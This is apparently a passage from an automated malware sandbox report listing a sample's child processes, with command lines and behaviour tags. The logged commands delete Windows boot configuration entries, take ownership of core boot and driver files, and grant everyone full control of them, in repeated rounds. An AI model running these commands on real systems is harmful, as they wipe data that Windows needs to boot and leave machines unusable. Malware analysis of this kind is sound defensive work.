- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2108
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1684
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2568
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2396
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2416
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:308
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2536
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2124
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2288
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2936
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2172
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:580
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2748
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2804
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2880
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2764
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2908
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2932
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2788
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2768
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  - Modifies file permissions
  PID:2368
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2640
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2988
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2628
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2744
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2776
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2660
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:1904
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:832
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:572
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:652
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2148
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2140
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2512
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1384
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1720
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:284
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:840
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1896
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2816
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1072
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1156
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2000
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1760
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2924
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2848
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2824
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:2856
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2972
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2700
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2468
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:588
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2076
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2204
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2236
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2928
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1656
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:444
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2100
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2588
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:704
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:896
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:784
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2300
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1512
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1804
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2372
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:612
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1664
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1364
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:780
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2584
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2324
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:1928
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2968
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  PID:344
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:1988
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2448
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:1936
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:1744
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2024
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:880
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2460
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3048
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3060
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  - Modifies file permissions
  PID:1596
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  - Modifies file permissions
  PID:2068
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2064
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  - Possible privilege escalation attempt
  PID:2400
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:2052
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1700
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2576
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:856
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:2940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2796
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:2936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:320
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:2328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2716
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:2752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2756
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2712
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2876
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2760
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:2888
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:2892
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2612
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2472
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2724
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2820
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2920
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:1884
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2884
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:1864
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2772
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2648
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1940
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:1904
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:1800
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  - Possible privilege escalation attempt
  PID:1048
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:1816
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:2012
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:988
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  - Modifies file permissions
  PID:2672
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:2828
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:268
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:2428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:628
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1456
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1408
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1564
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
  2⤵
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2592
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
  2⤵
  PID:284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1612
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
  2⤵
  PID:840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2004
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2168
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
  2⤵
  PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1616
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
  2⤵
  PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1680
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
  2⤵
  PID:1156
- C:\Windows\system32\icacls.exe
  icacls C:\ntldr /grant ""everyone"":F
  2⤵
  PID:820
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
  2⤵
  PID:2952
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
  2⤵
  PID:2704
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
  2⤵
  - Possible privilege escalation attempt
  PID:2708
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
  2⤵
  PID:2840
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
  2⤵
  PID:2508
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
  2⤵
  PID:2232
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
  2⤵
  PID:2180
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
  2⤵
  PID:2200
- C:\Windows\system32\icacls.exe
  icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
  2⤵
  PID:2132
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {current}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2188
- C:\Windows\system32\bcdedit.exe
  bcdedit /delete {default}
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2076
- C:\Windows\system32\takeown.exe
  takeown /f C:\ntldr
  2⤵
  PID:2644
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\hal.dll
  2⤵
  PID:2236
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\ntoskrnl.exe
  2⤵
  PID:1880
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winresume.exe
  2⤵
  PID:804
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\winload.exe
  2⤵
  PID:408
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\acpi.sys
  2⤵
  PID:2960
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\classpnp.sys
  2⤵
  PID:1144
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\disk.sys
  2⤵
  PID:1956
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ndis.sys
  2⤵
  PID:1576
- C:\Windows\system32\takeown.exe
  takeown /f C:\Windows\sysnative\drivers\ntfs.sys
  2⤵
  PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1292
- C:\Windows\system32\cacls.exe
  cacls C:\ntldr /g ""everyone"":F
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1252
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
  2⤵
  PID:896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:2008
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
  2⤵
  PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo y "
  2⤵
  PID:1052
- C:\Windows\system32\cacls.exe
